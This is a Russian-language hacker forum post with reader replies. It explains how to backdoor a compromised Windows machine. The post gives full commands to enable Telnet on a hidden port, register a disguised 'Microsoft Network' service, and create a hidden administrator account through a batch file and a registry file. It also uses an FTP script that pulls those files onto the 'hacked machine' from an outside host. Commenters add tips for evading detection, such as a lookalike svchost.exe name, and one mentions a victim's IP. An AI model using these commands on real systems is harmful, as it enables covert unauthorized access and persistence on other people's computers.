Нетрадиционные способы закрепиться на вин машине. 1h Интра. Все знают как ставить удаленно радмин через консоль, способ конечно хороший, но впринципе можно обойтись и без радмина, поэтому речь данной статьи пойдет о том как можно закрепиться на вин машине другим способом и поднять на ней парочку самых нужных вам серверов Статья расчитана на тех у кого есть опыт работы в командной строке винды. 2h Поехали ! Вот вы получили шел доступ к тачке которая постоянно онлайн и с широким каналом, а терять такой шел ой как не хочеться поэтому приступим: Многие знают что в винде есть такой сетевой демон Telnet, запуск которого по умолчанию отключен, можно конечно , его включить,но сначала надо сменить тип его запуска на auto(по дефолту disabled ) sc config tlntsvr start= auto можно впринципе уже запускать Telnet сервер, но так как он по умолчанию будет висеть на 23 порту не есть гуд слишком палевно так что конфигурируюм его так, tlntadmn config port=1001 sec=-NTLM где номер port'а должен быть до 1024, лучше неуказывать попсовые порты, дабы если вы укажете порт нетбиоса ,который например уже юзаеться из-за того, что юзер сиди помимо нета еще и в локалке ,то телнет сервер нестартанет так как порт будет занят и придеться обломаться. после конфигурации Telnet сервера запускаем его net start Telnet В принципе все уже готово осталось тока добавить нового админа, подрубиться и наслаждаться только что полученным шелом. Все это конечно хорошо, но имя службы Telnet очень палевное, поэтому я решил рассмотреть создание фейковой службы, которая запускает все тот же tlntsvr.exe под тем же или другим именем, можно например создать копию tlntsvr.exe в той же папке (system32) с имнем system.exe или System без расширения, так даже круче потому-что намного беспалевней чем tlntsvr.exe, кстати все службы запускаються с правами системы, можно конечно заюзать любимое многими вирмейкерами имя svchost.exe, но так как в system32 уже есть такой бинарник, то придеться грузить его из каконибудь другой папки. Регистрация новой службы: sc create "Microsoft Network" binpath= %windir%\system32\tlntsvr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP sc description "Microsoft Network" "Позволяет вашему компьютерам получать доступ к ресурсам сети Microsoft." в binapth надо указать путь к самому tlntsvr.exe или его копии с другим именем, вообщем данным способом можно создавать свою службу которая будет грузить любой бинарник - это нам понадобиться чуть позже сразу после создания нашей службы настраиваем телнет сервер с помошью tlntadmn как было описано выше, все осталось тока запустить службу пишем net start "Имя службы какое вы указали в displayname" net start "Служба доступа к сети Microsoft" Так как все команды писать вручную или копипастить не лучший вариант, то создаем батник следующего содержания: chcp 1251 net user SUPPORT_388945a0 /delete net user SUPPORT_388945a0 1234 /add net localgroup Администраторы SUPPORT_388945a0 /add net localgroup Пользователи SUPPORT_388945a0 /del regedit /s conf.reg sc create "Microsoft Network" binpath= %windir%\system32\tlntsvr.exe type= own start= auto displayname= "Служба доступа к сети Microsoft" error= ignore depend= RPCSS/TCPIP/NTLMSSP sc description "Microsoft Network" "Позволяет вашему компьютерам получать доступ к ресурсам сети Microsoft." net start "Служба доступа к сети Microsoft" tlntadmn config port=1001 sec=-NTLM Пояснения к батнику: chcp 1251 меняем кодовую страницу на 1251 так как батник написан не в дос кодировке немного о SUPPORT_388945a0: это стандартная виндосовская учетка какая есть в xp prof и в 2003 server, по дефолту она отключена,поэтому использовать ее имя дла нового админа будет наилучшим вариантом. Так как при создании нового админа он будет виден в welcome screen'е, отключить его можно импортировав рег файл следующего содержания: Содержимое conf.reg Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] "SUPPORT_388945a0"=dword:00000000 В принципе можно не удалять и не создавать заново эту супортовскую учетку, а сделать так net user SUPPORT_388945a0 1234 net localgroup Администраторы SUPPORT_388945a0 /add net localgroup тут_суппорт SUPPORT_388945a0 /del Чтобы загрузить наш батник и рег с какого-нибудь народовского сайта на взломанную машину пишем в консоли cd %temp% echo open ftp.narod.ru>sc.txt echo login>>sc.txt echo pass>>sc.txt echo ascii>>sc.txt echo get /files/r.bat>>sc.txt echo get /files/conf.reg>>sc.txt echo bye>>sc.txt ftp -s:sc.txt Все осталось тока выполнить наш батник r.bat и юзать взломанную тачку через телнет. Плюсы и минусы поднятия Telnet сервера: + Если юзать виндосовский телнет клиент то будет работать автодополнение + Все есть в самой системе + Нет проблем с антивирусом - Нет шифрования трафика - Создаеться профиль пользователя под каким мы логинимся, но это поправимо см.в конце - При подключении будет висеть процесс cmd.exe запущенный от имени supp..... ___________________________________________________________________________________________________ Ну вот мы и подошли ко второму способу забекдурить вин машину, а бекдурить мы будем ее как это не смешно с помошью open ssh сервера Начнем ! (имееться ввиду инсталяционный скрипт NSIS'а подправить ) ................. ____________________________________________________________________________________________________ Writed by Null Извините недописал статью , пока что времени нет . http://0xff.by.ru/bd.txt
имхо запихнуть свой svchost.exe можно если букву "о" написать русскую. Тогда визуально в процессах их не отличить, а согласитесь юзверь не каждый день лазит в папку system32 и вероятность того, что он увидит "лишний" svchost.exe ничтожно мала =)
Спасибо, работает. Только в Eventlog эта служба о своих запусках/остановках всё равно пишет от имени Телнета. Идеи есть?
а че нужно для доступа к файлам !?пофиг пусть палиться telnet там все равно никто не увидит!и я так понял что тока ето да? 1.sc config tlntsvr start= auto 2.tlntadmn config port=1001 sec=-NTLM 3.net start Telnet а дальше че делать? где там че писать надо!IP жертвы знаю! если нет доступа к файлам то какой есть?и что можно сделать? появится ли диспетчер или все время бут еста консоль?мне нужно доступ к компу в локалке через телнет!т.к. троя он не проглотит проверенно!
